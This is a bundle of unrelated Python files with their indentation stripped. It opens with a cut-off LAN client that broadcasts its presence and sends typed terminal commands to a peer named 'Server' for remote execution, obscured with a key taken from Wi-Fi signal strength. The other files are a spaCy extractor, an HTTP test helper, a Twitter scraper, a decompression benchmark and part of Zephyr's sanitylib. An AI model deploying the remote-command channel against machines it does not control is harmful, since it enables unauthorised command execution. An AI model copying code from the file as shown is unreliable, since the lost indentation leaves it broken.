#last_signal_strength = 0
PORT = 12345
Local_IP = get_ip()
search_NET = re.search(r'\b(?:[0-9]{1,3}\.){2}[0-9]{1,3}\b' , Local_IP)
Local_NET = search_NET.group()
buffer_size = 1024
#### -------------------------------- ####
old_packet = ""
start_time = 0
name = input("Enter your name : ")
Online_Users = []
def send_packet(HOST , packet):
global PORT,Online_Users
packet = packet.encode('utf-8' , 'replace')
try:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.settimeout(1)
s.connect((HOST , PORT))
s.sendall(packet)
except:
print("Server is not online any more")
for user in Online_Users:
if user[1] == HOST :
Online_Users.remove(user)
def listen_TCP_packets():
global PORT
global Local_IP
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((Local_IP , PORT))
s.listen()
while True:
conn , addr = s.accept()
data = conn.recv(buffer_size)
if not data :
break
string = str(data.decode('utf-8' , 'replace'))
receive(string)
conn.close()
def listen_broadcast():
global PORT
global buffer_size
global Local_IP
global old_packet
global start_time
global Online_Users
with socket.socket(socket.AF_INET , socket.SOCK_DGRAM) as s:
s.bind(('', PORT ))
s.setblocking(0)
while True:
result = select.select([s], [], [])
if not result:
break
message = result[0][0].recv(buffer_size)
if not message:
break
string = str(message.decode('utf-8' , 'replace'))
end_time= time.time()
elapsed_time = end_time - start_time
elapsed_time = float(format(elapsed_time , 'f'))
string = string[1:][:-1]
username = string.split(",")[0].strip()
IP = string.split(",")[1].strip()
packet_type = string.split(",")[2].strip()
if Local_IP != IP and (old_packet != string or elapsed_time > 5) :
#if (old_packet != string or elapsed_time > 5) :
if [username , IP] not in Online_Users:
Online_Users.append([username , IP])
packet = "[" + name + ", " + Local_IP + ", " + "response" + "]"
#packet_type = announce , response back with unicast TCP
start_new_thread(send_packet,(IP , packet))
old_packet = string
start_time = end_time
def receive(string):
global signal_strength
global Online_Users
string = string[1:][:-1]
username = string.split(",")[0].strip()
IP = string.split(",")[1].strip()
packet_type = ""
message = ""
if "message" in string :
packet_type = string.split(",")[2].strip()
message = string.split(",")[3].strip()
message = decrypt(message,signal_strength)
#rssi = string.split(",")[4].strip()
#print("rssi: " + rssi)
print("\n")
print("#####################")
print("\n")
print("Output of command is :")
#print("\n")
print(message)
print("#####################")
print("\n")
print("Please continue to write your instruction or command below")
print("\n")
#response packet
else:
packet_type = string.split(",")[2].strip()
if [username , IP] not in Online_Users:
Online_Users.append([username , IP])
def broadcast(sock,packet):
global PORT
sock.sendto(packet,( '<broadcast>', PORT))
def announce():
global PORT
global Local_IP
global name
packet = "[" + name + ", " + Local_IP + ", " + "announce" + "]"
packet = packet.encode('utf-8' , 'replace')
while True :
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(('', 0))
sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
count = 0
# Send 3 broadcast packets
while count<3 :
start_new_thread(broadcast,(sock,packet))
#sock.sendto(packet , ( '<broadcast>', PORT))
#sleep 0.25 seconds between packets
count = count +1
time.sleep(0.25)
sock.close()
time.sleep(10)
def sendmessage():
global signal_strength
global Online_Users
global Local_IP
global name
#printOnlineUsers()
#ip = input("Enter IP of user : ")
message = input("Enter your terminal command : ")
p = subprocess.Popen("iwconfig", stdout=subprocess.PIPE, stderr=subprocess.PIPE)
cmd, err = p.communicate()
cmd = cmd.decode("utf-8")
index = cmd.find("Signal level")
signal_strength = int(cmd[index+13:index+16])
#last_signal_strength = signal_strength
message = encrypt(message,signal_strength)
checker = None
for user in Online_Users:
if(user[0]=="Server"):
ip=user[1]
packet = "[" + name + ", " + Local_IP + ", " + "message" + ", " + message + ", " + str(signal_strength) + "]"
start_new_thread(send_packet,(ip , packet))
checker = True
break
if(checker== None):
print("####################")
print("Server is not online")
print("####################")
def myProfile():
global PORT
global Local_IP
global Local_NET
global name
print("#####################")
print("MY PROFİLE : ")
print("Username : " + name)
print("Local IP : " + Local_IP)
print("Local NET : "+ Local_NET)
print("PORT : " + str(PORT))
print("#####################")
def quit_app():
subprocess.call(["pkill", "-f" , "client.py"])
def commands():
print("#####################")
print("AVAILABLE COMMANDS")
print("#####################")
commands = ["1)Show my profile" , "2)Send a terminal command" , "3)Quit"]
for command in commands :
print(command)
#print("In order to List online users , type 0")
print("In order to Show my profile , type 1")
print("In order to Send a terminal command , type 2")
print("In order to Quit , type 3")
command = input("Enter your command : ")
if command == "1" :
myProfile()
elif command == "2" :
sendmessage()
elif command == "3":
quit_app()
else :
print("Invalid command")
announce_thread = threading.Thread(target = announce , args=())
announce_thread.setDaemon(True)
announce_thread.start()
listen_thread = threading.Thread(target= listen_broadcast , args=())
listen_thread.setDaemon(True)
listen_thread.start()
listen_packets_thread = threading.Thread(target= listen_TCP_packets , args=())
listen_packets_thread.setDaemon(True)
listen_packets_thread.start()
while True:
commands()
time.sleep(0.5)
|
extract_spacy_np.py
|
"""
Program to extract noun phrases from the given text dataset using the spaCy module
Lang: py3
"""
import os
import sys
import csv
import time
import datetime
import spacy
import queue
from threading import Thread
nlp = spacy.load("en")
#The directory where the output file is stored
OUTPUT_DIR = os.path.join(os.getcwd(), 'output')
#Number of threads processing the data on the queue
NUM_THREADS = 20
lst = []
def get_noun_phrases(q):
checkCounts = 0
while True:
#In case the queue size is 0, the thread will sleep for 5 * 0.5s (2.5s in total), after which it will quit
if(q.qsize() == 0):
if(checkCounts == 5):
break
checkCounts += 1
time.sleep(0.5)
continue
checkCounts = 0
index, tweet_id, text = q.get()
np_text = ""
#Extract the noun phrase using spacy
doc = nlp(text)
#All the noun phrases of given text are separated by "$$$"
for np in doc.noun_chunks:
np_text += np.text + "$$$"
#Add the extracted noun phrases to the list
global lst
lst.append([tweet_id, text, np_text])
#Print the status for every 5000 processed tweets
if(index > 0 and index % 5000 == 0):
print("Extracted noun phrases for", index, "tweets...")
q.task_done()
#Function to write the extracted noun phrases to file
def writeToFile(writer):
global lst
for elem in lst:
writer.writerow(elem)
lst = []
if(__name__ == "__main__"):
if(not(len(sys.argv) == 3)):
print("Usage: extract_spacy_np.py <INPUT_FILEPATH> <COLUMN_NUMBER_CONTAINING_TEXT>")
sys.exit()
if(not(sys.argv[2].isdigit())):
print("ERROR: The column number must be a digit.")
sys.exit()
#Input filepath
input_filepath = sys.argv[1]
#Column number of the text
col_num_text = int(sys.argv[2])
#If the input file is X/Y/input_file.csv, then output filename is input_file_spacyNP.csv
output_filepath = os.path.join(OUTPUT_DIR, input_filepath.split("/")[-1].split(".")[0] + "_spacyNP.csv")
#Initialize the queue
q = queue.Queue()
for i in range(NUM_THREADS):
#Create NUM_THREADS thread workers
worker = Thread(target=get_noun_phrases, args=(q,))
#worker.setDaemon(True)
worker.start()
start = datetime.datetime.now()
with open(input_filepath, "rt") as csvfile:
datareader = csv.reader(csvfile)
next(datareader)
count = 0
for row in datareader:
q.put((count, row[0], row[col_num_text - 1]))
count += 1
print("All items to be processed are in queue...")
q.join()
#Write the extracted noun phrases to a csv
with open(output_filepath, "w") as g:
#Initialize CSV writer object
writer = csv.writer(g, delimiter=',', quotechar='"', quoting=csv.QUOTE_ALL)
#Write the CSV column names
writer.writerow(["tweet_id", "preprocessed_text", "spacy_np"])
#Write all the noun_phrases to a file
writeToFile(writer)
print("Output file created in the output directory!")
print("Time taken to extract noun phrases for the given dataset:", datetime.datetime.now() - start)
|
httpexpect.py
|
# Copyright (c) 2019 Vitaliy Zakaznikov
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import http.client
CURDIR = os.path.dirname(os.path.realpath(__file__))
sys.path.insert(0, CURDIR)
import uexpect
from threading import Thread, Event
from queue import Queue, Empty
class IO(uexpect.IO):
def __init__(self, connection, response, queue, reader):
self.connection = connection
self.response = response
super(IO, self).__init__(None, None, queue, reader)
def write(self, data):
raise NotImplementedError
def close(self, force=True):
self.reader["kill_event"].set()
self.connection.close()
if self._logger:
self._logger.write("\n")
self._logger.flush()
def reader(response, queue, kill_event):
while True:
try:
if kill_event.is_set():
break
data = response.read(1).decode()
queue.put(data)
except Exception as e:
if kill_event.is_set():
break
raise
def spawn(connection, request):
connection = http.client.HTTPConnection(**connection)
connection.request(**request)
response = connection.getresponse()
queue = Queue()
reader_kill_event = Event()
thread = Thread(target=reader, args=(response, queue, reader_kill_event))
thread.daemon = True
thread.start()
return IO(
connection,
response,
queue,
reader={"thread": thread, "kill_event": reader_kill_event},
)
if __name__ == "__main__":
with spawn(
{"host": "localhost", "port": 8123},
{"method": "GET", "url": "?query=SELECT%201"},
) as client:
client.logger(sys.stdout)
client.timeout(2)
print(client.response.status, client.response.reason)
client.expect("1\n")
|
twscraper.py
|
# coding=utf-8
import sys
import unicodecsv as csv
import networkx as nx
import tweepy
import ConfigParser, os
import dal
import threading
from datetime import datetime, timedelta
def daterange(start_date, end_date, interval):
for n in range(int ((end_date - start_date).days/interval)+1):
yield start_date + timedelta(n*interval)
def chunks(l, n):
"""Yield successive n-sized chunks from l."""
for i in xrange(0, len(l), n):
yield l[i:i + n]
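# Illustrative example, not in the original: splitting a list into pairs
#   list(chunks([1, 2, 3, 4, 5], 2)) == [[1, 2], [3, 4], [5]]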
if sys.version_info[0] < 3:
import got
else:
import got3 as got
def main():
logger = logging.getLogger('main')
logger.info('Starting Process')
logger.info('Reading ini file')
config = ConfigParser.RawConfigParser()
config.read('config.ini')
consumer_key = config.get('twitter credentials','consumer_key')
consumer_secret = config.get('twitter credentials','consumer_secret')
access_token = config.get('twitter credentials','access_token')
access_token_secret = config.get('twitter credentials','access_token_secret')
savetocsv = config.getboolean('CSV','enabled')
logger.info('Authenticating')
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
api = tweepy.API(auth, wait_on_rate_limit=True)
user = api.get_user('eeftychiou')
logger.info("Connected to Twitter Api: %s",user._api.last_response.status_code)
logger.info("Connecting to Database")
dbacc = dal.TweetDal()
# start consumer and continue scrapping
logger.info("Starting Worker")
TW_thread = threading.Thread(target=TWconsumer)
TW_thread.start()
#TODO load criteria from ini file
searchTerms = 'refugee OR réfugié OR rifugiato OR flüchtling OR flykting OR ' \
'mülteci OR menekült OR refugees OR refugeeswelcome OR refugeecrisis OR ' \
'refugeesGR OR refugeeconvoy'
searchTerms = 'refugee'
dateFrom = "2015-08-29"
dateToo = "2015-09-01"
interval = 5 #days to sample each search
maxTweetPerInterval = 250
dtFrom = datetime.strptime(dateFrom,'%Y-%m-%d')
dtToo = datetime.strptime(dateToo,'%Y-%m-%d')
#setup csv writer
if savetocsv:
csv.register_dialect('myDialect', delimiter=';', quoting=csv.QUOTE_ALL)
fname = dateFrom + "_" + dateToo + "_dump.csv"
outputFile =open(fname, "w+")
myFields = ['username' ,'date','retweets' , 'favorites','replies','text','geo','mentions','hashtags','id','permalink','conversationId','userid']
writer = csv.DictWriter(outputFile, fieldnames=myFields, dialect='myDialect')
writer.writeheader()
logger.info('*** Criteria *** ')
logger.info('searchTerms[%s]',searchTerms)
logger.info('dateFrom[%s] to:[%s] interval[%i] maxTweetPerInterval[%i]', dateFrom,dateToo, interval,maxTweetPerInterval)
for dtItfr in daterange(dtFrom,dtToo, interval):
dtItfrStr = dtItfr.strftime("%Y-%m-%d")
dtItToo = dtItfr + timedelta(interval)
dtIttooStr = dtItToo.strftime("%Y-%m-%d")
logger.info ('Starting export for from: %s to: %s ', dtItfrStr, dtIttooStr )
tweetCriteria = got.manager.TweetCriteria().setQuerySearch(searchTerms).setSince(dtItfrStr).setUntil(
dtIttooStr).setMaxTweets(maxTweetPerInterval)
tweets = got.manager.TweetManager.getTweets(tweetCriteria)
if savetocsv:
for t in tweets:
writer.writerow(t.data)
logger.info(' Rows %d saved to file...\n' % len(tweets))
tweetIDs = [x.data['id'] for x in tweets if not dbacc.tweetExists(x.data['id'])]
dbacc.add_jobs('tweet',tweetIDs)
logger.info('Finished Processing')
# TODO move into own package
def TWconsumer():
import logging
import logging.config
import itertools
import time
logging.config.fileConfig('logConfig.cfg')
TWlogger = logging.getLogger('TW')
TWlogger.info('Reading ini file')
config = ConfigParser.RawConfigParser()
config.read('config.ini')
consumer_key = config.get('twitter credentials','consumer_key')
consumer_secret = config.get('twitter credentials','consumer_secret')
access_token = config.get('twitter credentials','access_token')
access_token_secret = config.get('twitter credentials','access_token_secret')
TWlogger.info('Authenticating')
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
api = tweepy.API(auth, wait_on_rate_limit=True)
user = api.get_user('eeftychiou')
TWlogger.info("Connected to Twitter Api: %s",user._api.last_response.status_code)
TWlogger.info("Connecting to Database")
TWdbacc = dal.TweetDal()
Done = False
opList = ['tweet', 'user', 'wait' ,'done']
g = itertools.cycle(opList)
while not Done:
toggle = next(g)
ids = TWdbacc.get_jobs(toggle, 100)
if len(ids) == 0:
time.sleep(5)
continue
if toggle=='tweet':
ids = api.statuses_lookup(ids, include_entities=True)
for id in ids:
TWdbacc.add_tweet(id)
elif toggle=='user':
for userid in ids:
TWlogger.info("User %s" ,userid)
try:
if not TWdbacc.userExists(userid):
user = api.get_user(user_id =userid)
TWdbacc.add_user(user)
except tweepy.TweepError, e:
print e
if __name__ == '__main__':
import logging
import logging.config
logging.config.fileConfig('logConfig.cfg')
main()
|
acl_decompressor.py
|
import multiprocessing
import os
import platform
import psutil
import queue
import threading
import time
import re
import signal
import subprocess
import sys
# This script depends on a SJSON parsing package:
# https://pypi.python.org/pypi/SJSON/1.1.0
# https://shelter13.net/projects/SJSON/
# https://bitbucket.org/Anteru/sjson/src
import sjson
def parse_argv():
options = {}
options['acl'] = os.path.join(os.getcwd(), '../../test_data/decomp_data_v5')
options['stats'] = ""
options['csv'] = False
options['refresh'] = False
options['num_threads'] = 1
options['android'] = False
options['ios'] = False
options['print_help'] = False
for i in range(1, len(sys.argv)):
value = sys.argv[i]
# TODO: Strip trailing '/' or '\'
if value.startswith('-acl='):
options['acl'] = value[len('-acl='):].replace('"', '')
options['acl'] = os.path.expanduser(options['acl'])
if value.startswith('-stats='):
options['stats'] = value[len('-stats='):].replace('"', '')
options['stats'] = os.path.expanduser(options['stats'])
if value == '-csv':
options['csv'] = True
if value == '-refresh':
options['refresh'] = True
if value == '-android':
options['android'] = True
if value == '-ios':
options['ios'] = True
#if value.startswith('-parallel='):
# options['num_threads'] = int(value[len('-parallel='):].replace('"', ''))
if value == '-help':
options['print_help'] = True
if options['print_help']:
print_help()
sys.exit(1)
if options['stats'] == None or len(options['stats']) == 0:
print('-stats output directory is missing')
print_usage()
sys.exit(1)
if options['num_threads'] <= 0:
print('-parallel switch argument must be greater than 0')
print_usage()
sys.exit(1)
if not os.path.exists(options['acl']) or not os.path.isdir(options['acl']):
print('ACL input directory not found: {}'.format(options['acl']))
print_usage()
sys.exit(1)
if not os.path.exists(options['stats']):
os.makedirs(options['stats'])
if not os.path.isdir(options['stats']):
print('The output stat argument must be a directory')
print_usage()
sys.exit(1)
return options
def print_usage():
print('Usage: python acl_decompressor.py -acl=<path to directory containing ACL files> -stats=<path to output directory for stats> [-csv] [-refresh] [-parallel={Num Threads}] [-help]')
def print_help():
print('Usage: python acl_decompressor.py [arguments]')
print()
print('Arguments:')
print(' At least one argument must be provided.')
print(' -acl=<path>: Input directory tree containing clips to compress.')
print(' -stats=<path>: Output directory tree for the stats to output.')
print(' -csv: Generates a basic summary CSV file with various clip information and statistics.')
print(' -refresh: If an output stat file already exists for a particular clip, it is recompressed anyway instead of being skipped.')
print(' -android: Pulls the files from the android device')
print(' -ios: Only computes the stats')
#print(' -parallel=<Num Threads>: Allows multiple clips to be compressed and processed in parallel.')
print(' -help: Prints this help message.')
def print_stat(stat):
print('Algorithm: {}, Format: [{}], Ratio: {:.2f}, Error: {}'.format(stat['algorithm_name'], stat['desc'], stat['compression_ratio'], stat['max_error']))
print('')
def format_elapsed_time(elapsed_time):
hours, rem = divmod(elapsed_time, 3600)
minutes, seconds = divmod(rem, 60)
return '{:0>2}h {:0>2}m {:05.2f}s'.format(int(hours), int(minutes), seconds)
def get_decomp_categories():
categories = []
categories.append(('forward_pose_cold', 'forward', 'pose', 'cold'))
categories.append(('backward_pose_cold', 'backward', 'pose', 'cold'))
categories.append(('random_pose_cold', 'random', 'pose', 'cold'))
categories.append(('forward_pose_warm', 'forward', 'pose', 'warm'))
categories.append(('backward_pose_warm', 'backward', 'pose', 'warm'))
categories.append(('random_pose_warm', 'random', 'pose', 'warm'))
categories.append(('forward_bone_cold', 'forward', 'bone', 'cold'))
categories.append(('backward_bone_cold', 'backward', 'bone', 'cold'))
categories.append(('random_bone_cold', 'random', 'bone', 'cold'))
categories.append(('forward_bone_warm', 'forward', 'bone', 'warm'))
categories.append(('backward_bone_warm', 'backward', 'bone', 'warm'))
categories.append(('random_bone_warm', 'random', 'bone', 'warm'))
return categories
def create_csv(options):
csv_data = {}
stat_dir = options['stats']
if options['csv']:
decomp_categories = get_decomp_categories()
for category in decomp_categories:
stats_decompression_csv_filename = os.path.join(stat_dir, 'stats_decompression_{}_{}_{}.csv'.format(category[2], category[3], category[1]))
stats_decompression_csv_file = open(stats_decompression_csv_filename, 'w')
csv_data[category[0]] = stats_decompression_csv_file
print('Generating CSV file {} ...'.format(stats_decompression_csv_filename))
print('Clip Name, Min, Max, Avg', file = stats_decompression_csv_file)
return csv_data
def close_csv(csv_data):
if len(csv_data) == 0:
return
for csv_file in csv_data.values():
csv_file.close()
def append_csv(csv_data, job_data):
decomp_categories = get_decomp_categories()
data = job_data['stats_summary_data']
for (clip_name, perf_stats) in data:
#perf_stats[key] = (category, decomp_min, decomp_max, decomp_avg)
for key, stats in perf_stats.items():
if key in csv_data:
csv_file = csv_data[key]
(category, decomp_min, decomp_max, decomp_avg) = stats
print('{}, {}, {}, {}'.format(clip_name, decomp_min, decomp_max, decomp_avg), file = csv_file)
def print_progress(iteration, total, prefix='', suffix='', decimals = 1, bar_length = 40):
# Taken from https://stackoverflow.com/questions/3173320/text-progress-bar-in-the-console
# With minor tweaks
"""
Call in a loop to create terminal progress bar
@params:
iteration - Required : current iteration (Int)
total - Required : total iterations (Int)
prefix - Optional : prefix string (Str)
suffix - Optional : suffix string (Str)
decimals - Optional : positive number of decimals in percent complete (Int)
bar_length - Optional : character length of bar (Int)
"""
str_format = "{0:." + str(decimals) + "f}"
percents = str_format.format(100 * (iteration / float(total)))
filled_length = int(round(bar_length * iteration / float(total)))
bar = '█' * filled_length + '-' * (bar_length - filled_length)
# We need to clear any previous line we might have to ensure we have no visual artifacts
# Note that if this function is called too quickly, the text might flicker
terminal_width = 80
sys.stdout.write('{}\r'.format(' ' * terminal_width))
sys.stdout.flush()
sys.stdout.write('%s |%s| %s%s %s\r' % (prefix, bar, percents, '%', suffix)),
sys.stdout.flush()
if iteration == total:
sys.stdout.write('\n')
def run_acl_decompressor(cmd_queue, result_queue):
while True:
entry = cmd_queue.get()
if entry is None:
return
(acl_filename, cmd) = entry
os.system(cmd)
result_queue.put(acl_filename)
def decompress_clips_android(options):
acl_dir = options['acl']
stat_dir = options['stats']
stat_files = []
for (dirpath, dirnames, filenames) in os.walk(acl_dir):
stat_dirname = dirpath.replace(acl_dir, stat_dir)
for filename in filenames:
if not filename.endswith('.acl.sjson') and not filename.endswith('.acl.bin'):
continue
acl_filename = os.path.join(dirpath, filename)
if filename.endswith('.acl.sjson'):
stat_filename = os.path.join(stat_dirname, filename.replace('.acl.sjson', '_stats.sjson'))
else:
stat_filename = os.path.join(stat_dirname, filename.replace('.acl.bin', '_stats.sjson'))
stat_files.append(stat_filename)
if not os.path.exists(stat_dirname):
os.makedirs(stat_dirname)
if len(stat_files) == 0:
print('No ACL clips found to decompress')
sys.exit(0)
output = str(subprocess.check_output('adb logcat -s acl -e "Stats will be written to:" -m 1 -d'))
matches = re.search('Stats will be written to: ([/\.\w]+)', output)
if matches == None:
print('Failed to find Android source directory from ADB')
print('/storage/emulated/0/Android/data/com.acl/files will be used instead')
android_src_dir = '/storage/emulated/0/Android/data/com.acl/files'
else:
android_src_dir = matches.group(1)
curr_dir = os.getcwd()
os.chdir(stat_dir)
for stat_filename in stat_files:
dst_filename = os.path.basename(stat_filename)
src_filename = os.path.join(android_src_dir, dst_filename).replace('\\', '/')
cmd = 'adb pull "{}" "{}"'.format(src_filename, dst_filename)
os.system(cmd)
os.chdir(curr_dir)
return stat_files
def decompress_clips(options):
acl_dir = options['acl']
stat_dir = options['stats']
refresh = options['refresh']
if platform.system() == 'Windows':
decompressor_exe_path = '../../build/bin/acl_decompressor.exe'
else:
decompressor_exe_path = '../../build/bin/acl_decompressor'
decompressor_exe_path = os.path.abspath(decompressor_exe_path)
if not os.path.exists(decompressor_exe_path) and not options['ios']:
print('Decompressor exe not found: {}'.format(decompressor_exe_path))
sys.exit(1)
stat_files = []
cmd_queue = queue.Queue()
for (dirpath, dirnames, filenames) in os.walk(acl_dir):
stat_dirname = dirpath.replace(acl_dir, stat_dir)
for filename in filenames:
if not filename.endswith('.acl.sjson') and not filename.endswith('.acl.bin'):
continue
acl_filename = os.path.join(dirpath, filename)
if filename.endswith('.acl.sjson'):
stat_filename = os.path.join(stat_dirname, filename.replace('.acl.sjson', '_stats.sjson'))
else:
stat_filename = os.path.join(stat_dirname, filename.replace('.acl.bin', '_stats.sjson'))
stat_files.append(stat_filename)
if os.path.exists(stat_filename) and os.path.isfile(stat_filename) and not refresh:
continue
if options['ios']:
continue
if not os.path.exists(stat_dirname):
os.makedirs(stat_dirname)
cmd = '{} -acl="{}" -stats="{}" -decomp'.format(decompressor_exe_path, acl_filename, stat_filename)
if platform.system() == 'Windows':
cmd = cmd.replace('/', '\\')
cmd_queue.put((acl_filename, cmd))
if len(stat_files) == 0:
print("No ACL clips found to decompress")
sys.exit(0)
if not cmd_queue.empty():
# Add a marker to terminate the threads
for i in range(options['num_threads']):
cmd_queue.put(None)
result_queue = queue.Queue()
decompression_start_time = time.perf_counter()
threads = [ threading.Thread(target = run_acl_decompressor, args = (cmd_queue, result_queue)) for _i in range(options['num_threads']) ]
for thread in threads:
thread.daemon = True
thread.start()
print_progress(0, len(stat_files), 'Decompressing clips:', '{} / {}'.format(0, len(stat_files)))
try:
while True:
for thread in threads:
thread.join(1.0)
num_processed = result_queue.qsize()
print_progress(num_processed, len(stat_files), 'Decompressing clips:', '{} / {}'.format(num_processed, len(stat_files)))
all_threads_done = True
for thread in threads:
                    if thread.is_alive():
all_threads_done = False
if all_threads_done:
break
except KeyboardInterrupt:
sys.exit(1)
decompression_end_time = time.perf_counter()
print()
        print('Decompressed {} clips in {}'.format(len(stat_files), format_elapsed_time(decompression_end_time - decompression_start_time)))
return stat_files
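# Illustrative usage sketch (hypothetical paths and values, not part of the
# original script): decompress_clips() only needs the option keys read above,
# so a minimal options dictionary looks roughly like this:
#
#   options = {'acl': 'path/to/acl_clips', 'stats': 'path/to/stats',
#              'refresh': False, 'ios': False, 'num_threads': 4}
#   stat_files = decompress_clips(options)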
def run_stat_parsing(options, stat_queue, result_queue):
#signal.signal(signal.SIGINT, signal.SIG_IGN)
try:
num_runs = 0
stats_summary_data = []
decomp_categories = get_decomp_categories()
while True:
stat_filename = stat_queue.get()
if stat_filename is None:
break
with open(stat_filename, 'r') as file:
try:
file_data = sjson.loads(file.read())
runs = file_data['runs']
for run_stats in runs:
run_stats['filename'] = stat_filename
run_stats['clip_name'] = os.path.splitext(os.path.basename(stat_filename))[0]
num_runs += 1
perf_stats = {}
if 'decompression_time_per_sample' in run_stats:
for category in decomp_categories:
key = category[0]
if key in run_stats['decompression_time_per_sample']:
decomp_data = run_stats['decompression_time_per_sample'][key]
decomp_min = decomp_data['min_time_ms']
decomp_max = decomp_data['max_time_ms']
decomp_avg = decomp_data['avg_time_ms']
perf_stats[key] = (category, decomp_min, decomp_max, decomp_avg)
if options['csv']:
#(name, perf_stats)
data = (run_stats['clip_name'], perf_stats)
stats_summary_data.append(data)
result_queue.put(('progress', stat_filename))
except sjson.ParseException:
print('Failed to parse SJSON file: {}'.format(stat_filename))
# Done
results = {}
results['num_runs'] = num_runs
results['stats_summary_data'] = stats_summary_data
result_queue.put(('done', results))
except KeyboardInterrupt:
print('Interrupted')
def aggregate_job_stats(agg_job_results, job_results):
if job_results['num_runs'] == 0:
return
if len(agg_job_results) == 0:
agg_job_results.update(job_results)
else:
agg_job_results['num_runs'] += job_results['num_runs']
def set_process_affinity(affinity):
if platform.system() == 'Windows':
p = psutil.Process()
p.cpu_affinity([affinity])
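# A minimal sketch of a more portable variant, added for illustration only and
# never called by this script: on Linux the standard library exposes
# os.sched_setaffinity, while psutil covers Windows.
def _set_affinity_portable(core):
    if hasattr(os, 'sched_setaffinity'):
        os.sched_setaffinity(0, {core})  # pid 0 means the current process
    elif platform.system() == 'Windows':
        psutil.Process().cpu_affinity([core])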
if __name__ == "__main__":
if sys.version_info < (3, 4):
print('Python 3.4 or higher needed to run this script')
sys.exit(1)
options = parse_argv()
    # Set the process affinity to core 0 on platforms that support it; core 2 will be used to decompress
set_process_affinity(0)
if options['android']:
stat_files = decompress_clips_android(options)
else:
stat_files = decompress_clips(options)
csv_data = create_csv(options)
aggregating_start_time = time.perf_counter()
stat_queue = multiprocessing.Queue()
for stat_filename in stat_files:
stat_queue.put(stat_filename)
# Add a marker to terminate the jobs
for i in range(options['num_threads']):
stat_queue.put(None)
result_queue = multiprocessing.Queue()
jobs = [ multiprocessing.Process(target = run_stat_parsing, args = (options, stat_queue, result_queue)) for _i in range(options['num_threads']) ]
for job in jobs:
job.start()
agg_job_results = {}
num_stat_file_processed = 0
print_progress(num_stat_file_processed, len(stat_files), 'Aggregating results:', '{} / {}'.format(num_stat_file_processed, len(stat_files)))
try:
while True:
try:
(msg, data) = result_queue.get(True, 1.0)
if msg == 'progress':
num_stat_file_processed += 1
print_progress(num_stat_file_processed, len(stat_files), 'Aggregating results:', '{} / {}'.format(num_stat_file_processed, len(stat_files)))
elif msg == 'done':
aggregate_job_stats(agg_job_results, data)
append_csv(csv_data, data)
except queue.Empty:
all_jobs_done = True
for job in jobs:
if job.is_alive():
all_jobs_done = False
if all_jobs_done:
break
except KeyboardInterrupt:
sys.exit(1)
num_runs = agg_job_results['num_runs']
aggregating_end_time = time.perf_counter()
print()
print('Found {} runs in {}'.format(num_runs, format_elapsed_time(aggregating_end_time - aggregating_start_time)))
print()
close_csv(csv_data)
sanitylib.py
#!/usr/bin/env python3
# vim: set syntax=python ts=4 :
#
# Copyright (c) 2018 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import os
import contextlib
import string
import mmap
import sys
import re
import subprocess
import select
import shutil
import shlex
import signal
import threading
import concurrent.futures
from collections import OrderedDict
from threading import BoundedSemaphore
import queue
import time
import csv
import glob
import concurrent
import xml.etree.ElementTree as ET
import logging
import pty
from pathlib import Path
import traceback
from distutils.spawn import find_executable
from colorama import Fore
import pickle
import platform
import yaml
import json
try:
# Use the C LibYAML parser if available, rather than the Python parser.
# It's much faster.
from yaml import CSafeLoader as SafeLoader
from yaml import CDumper as Dumper
except ImportError:
from yaml import SafeLoader, Dumper
try:
import serial
except ImportError:
print("Install pyserial python module with pip to use --device-testing option.")
try:
from tabulate import tabulate
except ImportError:
print("Install tabulate python module with pip to use --device-testing option.")
try:
import psutil
except ImportError:
print("Install psutil python module with pip to run in Qemu.")
ZEPHYR_BASE = os.getenv("ZEPHYR_BASE")
if not ZEPHYR_BASE:
sys.exit("$ZEPHYR_BASE environment variable undefined")
# This is needed to load edt.pickle files.
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts", "dts"))
import edtlib # pylint: disable=unused-import
hw_map_local = threading.Lock()
report_lock = threading.Lock()
# Use this for internal comparisons; that's what canonicalization is
# for. Don't use it when invoking other components of the build system
# to avoid confusing and hard to trace inconsistencies in error messages
# and logs, generated Makefiles, etc. compared to when users invoke these
# components directly.
# Note "normalization" is different from canonicalization, see os.path.
canonical_zephyr_base = os.path.realpath(ZEPHYR_BASE)
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/"))
from sanity_chk import scl
from sanity_chk import expr_parser
logger = logging.getLogger('sanitycheck')
logger.setLevel(logging.DEBUG)
pipeline = queue.LifoQueue()
class CMakeCacheEntry:
'''Represents a CMake cache entry.
This class understands the type system in a CMakeCache.txt, and
converts the following cache types to Python types:
Cache Type Python type
---------- -------------------------------------------
FILEPATH str
PATH str
STRING str OR list of str (if ';' is in the value)
BOOL bool
INTERNAL str OR list of str (if ';' is in the value)
---------- -------------------------------------------
'''
# Regular expression for a cache entry.
#
# CMake variable names can include escape characters, allowing a
# wider set of names than is easy to match with a regular
# expression. To be permissive here, use a non-greedy match up to
# the first colon (':'). This breaks if the variable name has a
# colon inside, but it's good enough.
CACHE_ENTRY = re.compile(
r'''(?P<name>.*?) # name
:(?P<type>FILEPATH|PATH|STRING|BOOL|INTERNAL) # type
=(?P<value>.*) # value
''', re.X)
@classmethod
def _to_bool(cls, val):
# Convert a CMake BOOL string into a Python bool.
#
# "True if the constant is 1, ON, YES, TRUE, Y, or a
# non-zero number. False if the constant is 0, OFF, NO,
# FALSE, N, IGNORE, NOTFOUND, the empty string, or ends in
# the suffix -NOTFOUND. Named boolean constants are
# case-insensitive. If the argument is not one of these
# constants, it is treated as a variable."
#
# https://cmake.org/cmake/help/v3.0/command/if.html
val = val.upper()
